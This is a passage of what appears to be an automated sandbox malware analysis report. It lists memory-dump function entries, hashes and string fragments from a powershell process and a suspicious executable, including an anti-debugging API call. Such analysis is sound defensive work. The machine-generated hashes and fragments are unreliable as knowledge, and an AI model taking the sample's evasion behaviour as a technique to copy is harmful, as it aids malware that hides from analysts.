Instruction ID: 7e0fe06a546437b956416e4f0e140da66439bc360b5735faf61c407e03ba8fc3
Opcode Fuzzy Hash: 4a8999b3f27f3b587288df03b230a722e8e7c09683b5af0c3410eee5694e4235
Instruction Fuzzy Hash: E9E0ED353002158F87109B1DD858C26B7FAEFCE71571510A9F649CB725DA61EC01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 043FE9FE Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a748d92b8cd95d5143385f772fc4907b967ca905a08d0cd63c57c2790a107e2e
Instruction ID: 61a19249d0df31ad3592f02bda9b0b9f2e510618e3048890813c39a7fa6f2b31
Opcode Fuzzy Hash: a748d92b8cd95d5143385f772fc4907b967ca905a08d0cd63c57c2790a107e2e
Instruction Fuzzy Hash: CCF06D39A02118DFCB00CF98EA95D9DBBB2FF48611B258155F905A7351DB35AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 043F9629 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ea5a58c430be29bbb7fbe522ec7dca72b3cc70b9e58d39b710676afce5119e
Instruction ID: b192d2153fbb52a2b2699e7d399fcfffb6117b2d04f5865608575afb85febe7c
Opcode Fuzzy Hash: e9ea5a58c430be29bbb7fbe522ec7dca72b3cc70b9e58d39b710676afce5119e
Instruction Fuzzy Hash: BCE012B670512D1B266C74AE9C017BB95CFCED44787052137AB09D7A81DE50EC0542E2

Uniqueness

Uniqueness Score: -1.00%

Function 043F9248 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d54593dc83ab9553030ec5749afe688493de08ac816d0be413393c583d6ab8
Instruction ID: 00d05ed0fe3db3d83b58b803d40bfa95c1fe4c69cda5099af2321879e3f54677
Opcode Fuzzy Hash: b8d54593dc83ab9553030ec5749afe688493de08ac816d0be413393c583d6ab8
Instruction Fuzzy Hash: E7F06D709013045FD7649FB9E89839ABBE9FB44314F044469D24EC3340DB3968818B90

Uniqueness

Uniqueness Score: -1.00%

Function 043F8819 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6bc83e3114fbe22f0b8b693546c8a71189012a38c9aad383363f6044fb8c7b
Instruction ID: 843253cfe4279b18eb89d2d67359cfb672e5776f06709d48b1d00734c12fd9fa
Opcode Fuzzy Hash: ef6bc83e3114fbe22f0b8b693546c8a71189012a38c9aad383363f6044fb8c7b
Instruction Fuzzy Hash: 1DE0483594A15A8BCB0CFBB5F4474FD7F34FB11351B80015AE64682541EA25198ACAD1

Uniqueness

Uniqueness Score: -1.00%

Function 043FF538 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b8eb2dfb9c83d0cd3d062168bb733831434909db963b5230debe6efc6d23c6
Instruction ID: 2c44feea3c714109a5fce7dee8b090c449005ae80abd4487056a2a444699ea7c
Opcode Fuzzy Hash: 15b8eb2dfb9c83d0cd3d062168bb733831434909db963b5230debe6efc6d23c6
Instruction Fuzzy Hash: C8E0ED75D052499FCB50EFB8C84159AFFF4AB09210B6185AEC988E7201E6316941DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 043F88E0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe514015405f0e42ae91a409e4bbee6e237b4aa7ec92bb572074e68820fb933d
Instruction ID: 49a36a7ddaf17e063d6df9c9ccb5b295e7f1d5579c93ce9a147d80cc28219881
Opcode Fuzzy Hash: fe514015405f0e42ae91a409e4bbee6e237b4aa7ec92bb572074e68820fb933d
Instruction Fuzzy Hash: 60E0DF36A0924A8BCB08EBA5F8875EEBFB9AB05210B004056EE0483B41EA315894CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 043F8A58 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb49e4b277717050739089f0dacbd42d70b547de80768d185618fd1fa17089c
Instruction ID: 3e0897b78c15306ec4297867cfcb8b5c2daecd7d715ace0f987e822ce28bdcf3
Opcode Fuzzy Hash: 4bb49e4b277717050739089f0dacbd42d70b547de80768d185618fd1fa17089c
Instruction Fuzzy Hash: 90E0263130661447CB0C377AB80C2AE7A9AFBC4728F08402AD70A83340CF3C1C0283D9

Uniqueness

Uniqueness Score: -1.00%

Function 043F9630 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3536dfdf9fda64ef675e1597a8c71e5a387021143c74ea5b9730b8c2e1ed56
Instruction ID: ad5b3b37fe2a3fb69e630524ed39b39b9e3fa4e420fc45f49899e049617f50c0
Opcode Fuzzy Hash: 3e3536dfdf9fda64ef675e1597a8c71e5a387021143c74ea5b9730b8c2e1ed56
Instruction Fuzzy Hash: 91D05E9230112D1B276C38AE9C0077B91CFCED48B8B053137AB08DB681EE50EC0103E2

Uniqueness

Uniqueness Score: -1.00%

Function 043FDDC8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 5d03618b426e7203093bbbf7f7e96b091203020ff56240ad4a2d6b77147bd5fd
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: CEE08631B00114978B089559D8144D9F7AADBCC220F04847ADA4AA7740DE32691587E1

Uniqueness

Uniqueness Score: -1.00%

Function 043FF548 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: dd756763b51de8f8eaf239a6c5f5a6e1176af6e55129e733e018308071d94374
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 82D06271D042099F8784DFADC94156DFBF4EB48200F5085AA891DD7301F73196128FD5

Uniqueness

Uniqueness Score: -1.00%

Function 043F8828 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95a03cdab8fcf8804b621f07bbf4dbbfcaa698a9e8281e421d65873b1e62bdb
Instruction ID: 255c926b488606011a67f2f6bff9de072faeff63a40b83539eb5333ba469048b
Opcode Fuzzy Hash: e95a03cdab8fcf8804b621f07bbf4dbbfcaa698a9e8281e421d65873b1e62bdb
Instruction Fuzzy Hash: 63D06731906109CBCB0CABA5F85B4BEBB38FB14301F404169EA0752590FB352A5ACAC1

Uniqueness

Uniqueness Score: -1.00%

Function 043F88F0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee1b3e5111357d7bfefd1865961895bb33b9a5d46271e4a6842e8453c729a54
Instruction ID: a44dd4c007b9f8e3c53ca9530e40203cc88154cc1c6e8b67f92b4287b5976783
Opcode Fuzzy Hash: 9ee1b3e5111357d7bfefd1865961895bb33b9a5d46271e4a6842e8453c729a54
Instruction Fuzzy Hash: 87D01234A052098BCB08EF65E85646EBBB9E744201F004155DE4593740EA305C41CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 043F79FA Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38da72c95e674623779d52cb921ba5ebe752a949ee253f31032871304f0438f5
Instruction ID: d04196fadb6bff30603e115b4f488dff87e64b672402d3e5e618fdb171be7ff7
Opcode Fuzzy Hash: 38da72c95e674623779d52cb921ba5ebe752a949ee253f31032871304f0438f5
Instruction Fuzzy Hash: DAD0C93518E3C44FCB179BF9E4988D97F706E4322470919DED4868F5A3C5768449CB02

Uniqueness

Uniqueness Score: -1.00%

Function 043FEB27 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac7c33af28e5cd6d53dae0461873cc24f85a9fbdf59f26328f99b84ae50eb30
Instruction ID: 129948906bfc41cfc244f59c0298313c1e120c74c48f9d7501ea15d574e8ba33
Opcode Fuzzy Hash: aac7c33af28e5cd6d53dae0461873cc24f85a9fbdf59f26328f99b84ae50eb30
Instruction Fuzzy Hash: 00D09239B01218CFDB04CB94E895A9CB371FB84316F218066EA1597250DB36AD12CB40

Uniqueness

Uniqueness Score: -1.00%

Function 043F7F71 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9284a9f4de8dc3e9285ee3ff1362b9064c1b413410b5019d7b8b0044409a5c6
Instruction ID: e0b16db46f6a011cf8c0b90bbd9d5f18842a32bbacd1b3a2014946ff9953fa27
Opcode Fuzzy Hash: a9284a9f4de8dc3e9285ee3ff1362b9064c1b413410b5019d7b8b0044409a5c6
Instruction Fuzzy Hash: C9C0921661BB849FEB0302325C802C27F309B4346038E23DA4188CF553D12DC80FCF51

Uniqueness

Uniqueness Score: -1.00%

Function 043F7A08 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9352440ec71b9619e64581bdc956b5f8a60be2055d57bf660a4bbe5107e2ff8b
Instruction ID: 311ddf20dcef0b64e78dd3c93c7954a903c7873c46aebe3ece8ce02e7db23ec9
Opcode Fuzzy Hash: 9352440ec71b9619e64581bdc956b5f8a60be2055d57bf660a4bbe5107e2ff8b
Instruction Fuzzy Hash: A3B092310447098FC60A6FB6E418824732DBA80309B8008E8E50E0A6A28E37E845CA85

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 072C1043 Relevance: 20.3, Strings: 16, Instructions: 284COMMON

Download Yara Rule

Strings

$^q, xrefs: 072C132B
$^q, xrefs: 072C112D
`Q^q, xrefs: 072C121B
tP^q, xrefs: 072C11EF
$^q, xrefs: 072C12F1
`Q^q, xrefs: 072C11B5
$^q, xrefs: 072C110C
$^q, xrefs: 072C131B
$^q, xrefs: 072C1149
84Vl, xrefs: 072C11A6
`Q^q, xrefs: 072C1227
`Q^q, xrefs: 072C125B
84Vl, xrefs: 072C119C
fcq, xrefs: 072C116A
tP^q, xrefs: 072C11FB
$^q, xrefs: 072C1301

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: fcq$84Vl$84Vl$`Q^q$`Q^q$`Q^q$`Q^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2146122698
Opcode ID: dd7f3939fccd3b6c70b24f70df2694e8478c66126da3bbcbf77a26f255b15943
Instruction ID: 95f53041cd64a4158ba88e19fcefa2d3007177148f328f4ee6e6406fbad67451
Opcode Fuzzy Hash: dd7f3939fccd3b6c70b24f70df2694e8478c66126da3bbcbf77a26f255b15943
Instruction Fuzzy Hash: 48A1D5F462020FCFCB14DE58C846AAA7BE2BF95301F148659E8019B352CB75DCA5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 072C10A5 Relevance: 12.7, Strings: 10, Instructions: 176COMMON

Download Yara Rule

Strings

$^q, xrefs: 072C112D
84Vl, xrefs: 072C119C
`Q^q, xrefs: 072C121B
fcq, xrefs: 072C116A
tP^q, xrefs: 072C11EF
$^q, xrefs: 072C12F1
`Q^q, xrefs: 072C11B5
$^q, xrefs: 072C110C
$^q, xrefs: 072C1149
$^q, xrefs: 072C131B

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: fcq$84Vl$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1850729618
Opcode ID: b41d55016c444bcd100f5ededd4a956350b5384a8183ad7ee1befe6e8b5c2de1
Instruction ID: 6ba919ca92430f0a39327869500334bdb6555eefbba2b476feb5f14c8d02e416
Opcode Fuzzy Hash: b41d55016c444bcd100f5ededd4a956350b5384a8183ad7ee1befe6e8b5c2de1
Instruction Fuzzy Hash: 6861A0F463020FCFDB24CE44C446BA977F1AF62305F54825EE8019B292C7B5D8A5CB62

Uniqueness

Uniqueness Score: -1.00%

Function 072C3678 Relevance: 8.9, Strings: 7, Instructions: 191COMMON

Download Yara Rule

Strings

Nl, xrefs: 072C387B
Nl, xrefs: 072C386D
4'^q, xrefs: 072C3722
$^q, xrefs: 072C3836
$^q, xrefs: 072C37FF
4'^q, xrefs: 072C372E
$^q, xrefs: 072C382A

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$Nl$Nl
API String ID: 0-3285610534
Opcode ID: 28c28d24601b2dbed661de6221f1c748404f138c203de0c052d20c4c6df8c902
Instruction ID: f8cedf6aec1521ee2658996309c72914691d5ba8ff9ef2baf9c7f1c9bbd2c646
Opcode Fuzzy Hash: 28c28d24601b2dbed661de6221f1c748404f138c203de0c052d20c4c6df8c902
Instruction Fuzzy Hash: 66515AB17243079FCB24DA298911766BBE6AFD6610F24CA6FD405CB353DA31C889C793

Uniqueness

Uniqueness Score: -1.00%

Function 072C2327 Relevance: 8.9, Strings: 7, Instructions: 138COMMON

Download Yara Rule

Strings

pi k, xrefs: 072C23A0
pi k, xrefs: 072C2416
JYl, xrefs: 072C23D1
pi k, xrefs: 072C2363
JYl, xrefs: 072C23C5
pi k, xrefs: 072C23B0
JYl, xrefs: 072C237F

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: pi k$pi k$pi k$pi k$JYl$JYl$JYl
API String ID: 0-3647715818
Opcode ID: 50032c4403b8bc661897b32f5b652b6b46b97e3689d96145f87544260634fb23
Instruction ID: 3f8461c1d116521b58b7c26495d9c2676ab9e26a02167cdf1526561fe9aaf5ae
Opcode Fuzzy Hash: 50032c4403b8bc661897b32f5b652b6b46b97e3689d96145f87544260634fb23
Instruction Fuzzy Hash: 524168B672020ACFCF21DB6888402AABBE6FF95310F04867EE4158F251CF31C985C761

Uniqueness

Uniqueness Score: -1.00%

Function 072C24B8 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

JYl, xrefs: 072C25EA
4'^q, xrefs: 072C260D
rXl, xrefs: 072C254F
JYl, xrefs: 072C259E
|,"k, xrefs: 072C25DB
pi k, xrefs: 072C2582

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$pi k$|,"k$JYl$JYl$rXl
API String ID: 0-2174498982
Opcode ID: c8c55c050c117b36464e1689f71fe467be919664d870278a184513d92c6530bd
Instruction ID: c039af69d5f3c9d238dc149b448df315fc7ec4ce650a1de58fc82362d7c0340d
Opcode Fuzzy Hash: c8c55c050c117b36464e1689f71fe467be919664d870278a184513d92c6530bd
Instruction Fuzzy Hash: 774106F1A20207CFDB29CE18C450766B7E5FF65250F1482AED4059B251DF35DD84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 043F7AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

`_q, xrefs: 043F7D0C
tMXl, xrefs: 043F7B9C
`_q, xrefs: 043F7D8A
`_q, xrefs: 043F7C6A
`_q, xrefs: 043F7BEB

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: tMXl$`_q$`_q$`_q$`_q
API String ID: 0-2424070494
Opcode ID: dc876798417f568139ccd5bf01d30add7d06892c2b9295df937c561db2b989b4
Instruction ID: 146bb20385ce800b58d4f1e9c0cad7fad08fb8aa02d42fa424374618e3655036
Opcode Fuzzy Hash: dc876798417f568139ccd5bf01d30add7d06892c2b9295df937c561db2b989b4
Instruction Fuzzy Hash: 3EB1B774E002099FDB55DFA9D990A9DFBF2FF88300F14862AD419AB355EB30A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 043F7AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`_q, xrefs: 043F7D0C
tMXl, xrefs: 043F7B9C
`_q, xrefs: 043F7D8A
`_q, xrefs: 043F7C6A
`_q, xrefs: 043F7BEB

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: tMXl$`_q$`_q$`_q$`_q
API String ID: 0-2424070494
Opcode ID: 658ff9ea4a305a4f258fb322ea4b454e6be1447359ed44e8228e54657c2273aa
Instruction ID: cc9a208f1de948a132a7bb1d29b1a81b231562b82f5ca3ab615f8b43602e68ac
Opcode Fuzzy Hash: 658ff9ea4a305a4f258fb322ea4b454e6be1447359ed44e8228e54657c2273aa
Instruction Fuzzy Hash: 00B19774E012099FDB54DFA9D990A9DFBF2FF88300F14862AD419AB354DB30A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 072C5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 072C57AA
$^q, xrefs: 072C57C6
$^q, xrefs: 072C5800
$^q, xrefs: 072C57F4

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: d5bd997c0b4f3a2677886949b2c0d54922ceb1a2b2f0d45445cf02faa9c8d2cc
Instruction ID: 570b33b29eaf58d07aaa3e48e6fd1509a0a296384059603e28ddc4eb416ace17
Opcode Fuzzy Hash: d5bd997c0b4f3a2677886949b2c0d54922ceb1a2b2f0d45445cf02faa9c8d2cc
Instruction Fuzzy Hash: 082137717202069BDB34992B9D01B27B7DA9BE0710F34862EA406CF381DD75E8958361

Uniqueness

Uniqueness Score: -1.00%

Function 072C33F4 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

RXl, xrefs: 072C342B
,SXl, xrefs: 072C345D
,SXl, xrefs: 072C3469
p5Hk, xrefs: 072C344F

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: ,SXl$,SXl$p5Hk$RXl
API String ID: 0-3203730958
Opcode ID: 3c6c0af9e02c59ae24a17bb6595d0c61f4499b6520f5fb63603b16e8aa93aa8b
Instruction ID: 8eec59ace2c900a9bc5021adbf8ad6bce05c124bcdb5e00d5ee74efb53979ef4
Opcode Fuzzy Hash: 3c6c0af9e02c59ae24a17bb6595d0c61f4499b6520f5fb63603b16e8aa93aa8b
Instruction Fuzzy Hash: 32213BB27202178BCB32C6285C112A6FBD19BE6221B54CA7EC546CF656DA71C891C753

Uniqueness

Uniqueness Score: -1.00%

Function 043F4C62 Relevance: 5.1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

ln^, xrefs: 043F4CE2
ln^, xrefs: 043F4C62
ln^, xrefs: 043F4C92
ln^, xrefs: 043F4D32

Memory Dump Source

Source File: 00000001.00000002.1657701765.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID: ln^$ln^$ln^$ln^
API String ID: 0-3451003293
Opcode ID: 9eb71985218f3d379d4b049fdb0d24e97df29813c2364bdf6825be1b899cf80c
Instruction ID: 6fb76d1665c6b7536c946e0bc50a64f5cc5b40f44f4f18915c4938b2b4c01bd4
Opcode Fuzzy Hash: 9eb71985218f3d379d4b049fdb0d24e97df29813c2364bdf6825be1b899cf80c
Instruction Fuzzy Hash: D6215C1641E3D04FC3079B2898E92863F74EF63698F0A40DBC1C49F1A3D96A584FC796

Uniqueness

Uniqueness Score: -1.00%

Function 072C0308 Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

$^q, xrefs: 072C035E
$^q, xrefs: 072C0352
4'^q, xrefs: 072C0373
4'^q, xrefs: 072C037F

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 355786d31a58790d5acd9133683492ae76292fac8edd0dfe8b1eac935813f3eb
Instruction ID: 90291de4aaa2e244d6fa015eca7296f1f48e7d38f83fd3fd5d1b3e35ff345c63
Opcode Fuzzy Hash: 355786d31a58790d5acd9133683492ae76292fac8edd0dfe8b1eac935813f3eb
Instruction Fuzzy Hash: 0A012661B692968FC73A627C2C316A62BFA5FD3550B1D0AABD041CF356CD244C4983A2

Uniqueness

Uniqueness Score: -1.00%

Function 072C2108 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

JYl, xrefs: 072C214A
JYl, xrefs: 072C2156
$^q, xrefs: 072C2166
$^q, xrefs: 072C2172

Memory Dump Source

Source File: 00000001.00000002.1675621782.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$JYl$JYl
API String ID: 0-1549130959
Opcode ID: 5a146fab26d8d09e48bdbf3931f5cfc9bbc4b7ecf9469f7f5a1450485fb5c3e5
Instruction ID: 5c93cf3ac840bda3cbdb8661b628478ed5fdb87f2075bc7f8c2e68ee52709647
Opcode Fuzzy Hash: 5a146fab26d8d09e48bdbf3931f5cfc9bbc4b7ecf9469f7f5a1450485fb5c3e5
Instruction Fuzzy Hash: 4A014C716283828FC336462C1C11657BBE6AFE2510B0947DBC560DF2ABCDB08C08C362

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Hzoynygqzv.exePID: 7416, Parent PID: 7280COMMON

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	34.2%
Total number of Nodes:	38
Total number of Limit Nodes:	4

Executed Functions

Function 0542FB23 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0542FBC2

Memory Dump Source

Source File: 00000003.00000002.1654128174.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5420000_Hzoynygqzv.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 93b883c2fc6d718f84207a77ac66573ea08a2f54d3c0bde0702146f8817d551d
Instruction ID: e7cd54516d25fd243ab40c917f79bc3895aafd6c5b0db10ba6fc78edd423ff96
Opcode Fuzzy Hash: 93b883c2fc6d718f84207a77ac66573ea08a2f54d3c0bde0702146f8817d551d
Instruction Fuzzy Hash: 0241DEB5D04268DFCB00CFA9D585AEEFBF4BB49310F14942AE455B7240C778AA89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0542FB28 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0542FBC2

Memory Dump Source

Source File: 00000003.00000002.1654128174.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5420000_Hzoynygqzv.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: c110dbafeb63454dcefbbf5fc2169867910bc99c455425f58033aedadf09f9f5
Instruction ID: afbb7b9091106f1510ebad5d220a0b704307e4443c745a69d8ef86f583420b8b
Opcode Fuzzy Hash: c110dbafeb63454dcefbbf5fc2169867910bc99c455425f58033aedadf09f9f5
Instruction Fuzzy Hash: 2441EEB5D04268DFCB00CFA9D484AEEFBF0BB49310F14942AE455B7240C778AA89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05429318 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1654128174.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

